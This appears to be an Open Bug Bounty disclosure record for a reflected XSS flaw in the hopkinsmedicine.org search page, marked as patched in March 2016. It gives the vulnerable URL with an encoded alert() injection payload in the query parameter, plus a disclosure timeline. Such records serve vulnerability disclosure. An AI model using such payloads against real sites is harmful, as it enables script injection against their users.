hopkinsmedicine.org XSS vulnerability

2015-11-04T14:00:00
ID OBB:100756
Type openbugbounty
Reporter P4r4Bellum
Modified 2016-03-07T13:27:00

Description

Vulnerable URL:
http://www.hopkinsmedicine.org/search?form_instance=thincrust&client=hopkinsmedicine_frontend&proxystylesheet=hopkinsmedicine_frontend&output=xml_no_dtd&site=hopkinsmedicine_collection&q=%22-alert%28%22XSSPOSED%22%29-%22%3E&btnG=Search
Details:

Description| Value
---|---
Patched:| Yes, at 06.03.2016
Latest check for patch:| 06.03.2016 23:26 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 13372
Google Pagerank| 8
VIP website status:| Yes
Check hopkinsmedicine.org SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 4 November, 2015 14:00 GMT
Vulnerability existence verified and confirmed| 4 November, 2015 14:02 GMT
Vulnerability patched by the website owner| 7 March, 2016 13:27 GMT